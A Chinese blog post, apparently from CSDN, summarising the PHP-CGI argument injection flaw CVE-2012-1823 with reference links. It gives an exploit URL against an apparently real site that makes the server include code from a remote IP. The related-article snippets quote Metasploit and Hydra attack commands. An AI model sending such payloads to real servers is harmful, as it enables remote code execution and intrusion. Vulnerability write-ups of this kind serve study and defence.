PHP CGI Argument Injection

最新推荐文章于 2024-06-14 18:25:05 发布
最新推荐文章于 2024-06-14 18:25:05 发布
阅读量1.7k 收藏
点赞数
文章标签: php cgi 语言 web服务 服务器 脚本 
CVE ID: CVE-2012-1823

PHP是一种HTML内嵌式的语言,PHP与微软的ASP颇有几分相似,都是一种在服务器端执行的嵌入HTML文档的脚本语言,语言的风格有类似于C语言,现在被很多的网站编程人员广泛的运用。可以被各种Web服务器以多种方式调用,实现动态网页的功能。

PHP处理参数的传递时存在漏洞,在特定的配置情况下,远程攻击者可能利用此漏洞在服务器上获取脚本源码或执行任意命令。

当PHP以特定的CGI方式被调用时(例如Apache的mod_cgid),php-cgi接收处理过的查询格式字符串作为命令行参数,允许命令行开关(例如-s、-d 或-c)传递到php-cgi程序,导致源代码泄露和任意代码执行。FastCGI不受影响。
<* 参考
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
http://ompldr.org/vZGxxaQ
http://zone.wooyun.org/content/151
http://www.php-security.net/archives/9-New-PHP-CGI-exploit-CVE-2012-1823.html
http://www.php-security.net/archives/11-Mitigation-for-CVE-2012-1823-CVE-2012-2311.html
*>

 

exploit:

http://www.exploit-db.com/exploits/18836/

 

漏洞利用:

http://gdfreenet.cn/new.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://218.56.57.151/testtest.txt

cnbird2008
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【漏洞挖掘】——29、XSS闯关游戏录(上)
Fly_鹏程万里
03-22 1997
alf.nu/alert1是一个XSS训练平台,集结了一些常见的XSS漏洞利用场景,总共有29道题目。
PHP-CGI Windows平台远程代码执行漏洞复现(CVE-2024-4577)
0xSec
06-08 3042
2024年6月,PHP官方发布新版本,修复了PHP-CGI中一个远程代码执行漏洞。鉴于该漏洞无前置条件,易于利用,且默认情况下可获取操作系统权限,建议所有使用受影响版本的企业尽快升级修复,以确保安全。
Cve-2012-1823 PHP CGI Argument Injection Exploit
Yatere的天平秤
05-08 1407
原帖代码地址为: http://www.exploit-db.com/exploits/18836/ 由于其实为py2.x版本服务的,所以我将代码改为py3了。 代码如下: ###################################################################################### # Exploit Title: Cve
CVE-2024-4577 PHP-CGI漏洞
最新发布
好记性不如烂笔头
06-14 2202
CVE-2024-4577 PHP-CGI漏洞分析。有几个点需要了解一下(1)PHP CGI是什么 (2)CVE-2012-1823是什么漏洞 (3)Windows的“Best-Fit”特性是什么?为什么能利用它绕过CVE-2012-1823的修复 (4)PHP CGI重定向配置问题
metasploit中php_cgi,PHP CGI Argument Injection - 婕忔礊鍒╃敤 - 0day,Exploit,Shellcode
weixin_39959298的博客
03-18 144
### $Id$##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# web site for more information on licensing and...
网络安全80端口—-PHP CGI参数注入执行漏洞
旺仔Sec&blog
07-24 1355
80——-PHP CGI参数注入执行漏洞
Metasploitable2靶机之第十篇--PHP CGI参数注入执行漏洞(cve-2012-1823)
千寻的博客
04-03 1726
文章目录环境原理漏洞利用摘抄 环境 原理 漏洞利用 摘抄
【漏洞复现】CVE-2024-4577|PHP CGI Windows平台远程代码执行漏洞
信安百科
06-09 1441
【漏洞复现】CVE-2024-4577|PHP CGI Windows平台远程代码执行漏洞
PHP 面试总结(持续更新) --小丑
Yan 小铁匠
03-18 1913
Session与cookie的区别? cookie数据存放在客户的浏览器上,session数据放在服务器上,以文件的形式存放,可以从php.ini里面的session.save_path找到存放位置 cookie不是很安全 ,cookie可以进行cookie欺骗,别人可以获取cookie中的session id考虑到安全应当使用session。 session会在一定时间内保存在服务器...
Apache HTTP 过滤器filter、开源WAF(ModSecurity)、Apache 模块开发
西京刀客
03-08 2484
在编写Apache模块时,需要具备C或C++编程经验和对Apache Web服务器的基本了解。另外,需要参考Apache的文档和API参考手册来编写代码和构建模块。
原创:用python把链接指向的网页直接生成图片的http服务及网站(含源码及思想)
tengyunjiawu_com的专栏
07-28 2051
原创:用python把链接指向的网页直接生成图片的http服务及网站(含源码) 第一步 下载url2mage代码: git clone https://github.com/GZhY/html2image.git 总体思想:     希望让调用方通过 http调用传入一个需要生成图片的网页链接生成一个网页的图片并返回图片链接     最终调用方式比如:http://127.0.0.1:8
Multi injection
楠木大哥技术博客
09-26 217
Ninject 允许注入多个对象到一个特殊的类型或者接口。例如,我们有一个接口 IWeapon,和两个实现 Sword 和 Dagger :public interface IWeapon { string Hit(string target); }public class Sword : IWeapon { public string Hit(string target)
渗透之——Metasploit攻击PHP-CGI查询字符串参数漏洞并渗透内网
冰河的专栏
01-12 3354
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86357792 攻击机:Kali 192.168.109.137 靶机: Metasploitable2 192.168.109.159 内网另一台主机 Windows Server 2012 工具:Metasploit 目标计算机上的漏洞编号为CVE id 2012-1...
PHP CGI漏洞利用实验
weixin_51646864的博客
08-14 433
本地:linux2020.3 靶机:Metasploitable2-Linux 内网试验。 nmap扫描获取靶机ip:192.168.0.16 步骤: 1、启动msf,输入指令搜索该漏洞:search cve:2012-1823 2、使用use进入模块:use exploit/multi/http/php_cgi_arg_injection 3、查看需要配置的参数:show options 4、配置目标主机ip即可:set RHOSTS 192.168.0.16 5、进行攻击:exploit 下图攻
vulhub靶场php环境下的CVE-2012-1823(PHP-CGI远程代码执行漏洞)
m0_73248913的博客
02-12 450
msf解决vulhub
kali渗透metasploitable靶机
热门推荐
浮生若梦的专栏
11-16 2万+
扫描阶段: 工具:Nmap 隐蔽扫描      nmap  -sS 192.168.8.135 端口爆破:FTP、SSH等 工具:Hydra 备用字典 爆破FTP hydra -L  /root/Desktop/user.txt  -P  /root/Desktop/pass.txt  ftp://192.168.8.135 爆破SSH
CVE-2012-1823 php-cgi漏洞 metasploit利用脚本
收集盒 Book box
07-11 1571
> use exploit/multi/http/php_cgi_arg_injection > set rhost IP > set PAYLOAD php/meterpreter/bind_tcp > exploit
php cgi远程任意代码执行漏洞
收集盒 Book box
11-16 5786
CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战 GaRY  | 2012-05-04 02:16 国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞: http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/  粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi
invalid argument: mod_fcgid: can't run php-cgi.exe
06-10
这个错误通常是由于 FastCGI 没有正确配置所致。请确保你已经安装了正确版本的 PHP,并且已经将 PHP 的可执行文件路径添加到了你的服务器的 PATH 环境变量中。此外,还需要检查你的 FastCGI 配置文件,确保它正确地引用了 PHP 的可执行文件路径。如果你仍然无法解决这个问题,请提供更多详细信息,让我能够更好地了解你的环境和配置。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值